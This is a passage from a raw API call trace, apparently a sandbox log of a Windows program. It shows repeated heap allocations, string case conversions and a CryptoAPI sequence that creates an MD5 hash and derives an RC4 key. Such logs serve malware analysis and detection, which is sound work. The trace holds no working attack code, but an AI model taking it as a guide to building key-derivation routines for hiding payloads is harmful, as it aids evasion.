cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0253.127] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.127] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0253.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0253.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0253.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0253.128] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.128] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.128] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0253.128] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0253.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0253.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0253.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0253.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0253.129] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0253.129] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0253.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0253.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0253.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0253.129] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0253.129] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.129] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0253.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0253.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0253.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0253.130] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0253.130] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0253.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0253.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0253.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0253.130] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0253.130] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.130] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0253.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0253.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0253.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0253.131] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0253.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0253.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0253.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0253.131] CryptCreateHash (in: hProv=0xad31c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0253.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0253.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0253.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0253.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0253.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0253.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0253.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0253.132] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0253.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0253.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0253.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0253.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0253.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.132] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.132] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0253.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0253.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0253.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.132] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0253.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0253.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0253.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0253.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0253.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0253.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0253.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0253.133] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0253.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0253.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0253.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0253.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0253.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0253.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0253.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0253.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0253.134] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0253.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0253.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0253.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0253.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0253.134] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0253.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0253.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0253.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0253.135] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0253.135] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0253.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0253.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0253.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0253.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0253.135] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0253.135] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.135] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0253.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0253.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0253.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0253.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0253.135] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0253.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0253.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0253.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0253.136] CryptHashData (hHash=0xaa5920, pbData=0x24b1708, dwDataLen=0x3, dwFlags=0x1) returned 1 [0253.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0253.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0253.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0253.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0253.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0253.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0253.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0253.136] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0253.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0253.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0253.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0253.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0253.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0253.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0253.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0253.137] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.137] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0253.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0253.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0253.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0253.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0253.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0253.137] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0253.137] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0253.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0253.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0253.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0253.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0253.137] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0253.137] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.137] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0253.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0253.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0253.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0253.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0253.138] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0253.138] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0253.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0253.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0253.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0253.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0253.138] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0253.138] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.138] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0253.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0253.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0253.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0253.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0253.139] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0253.139] CryptDeriveKey (in: hProv=0xad31c0, Algid=0x6601, hBaseData=0xaa5920, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5660) returned 1 [0253.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0253.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0253.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0253.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0253.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0253.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0253.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0253.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0253.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0253.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0253.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0253.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0253.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0253.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0253.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0253.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0253.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0253.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0253.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0253.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0253.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0253.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0253.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0253.140] HeapFree (in: 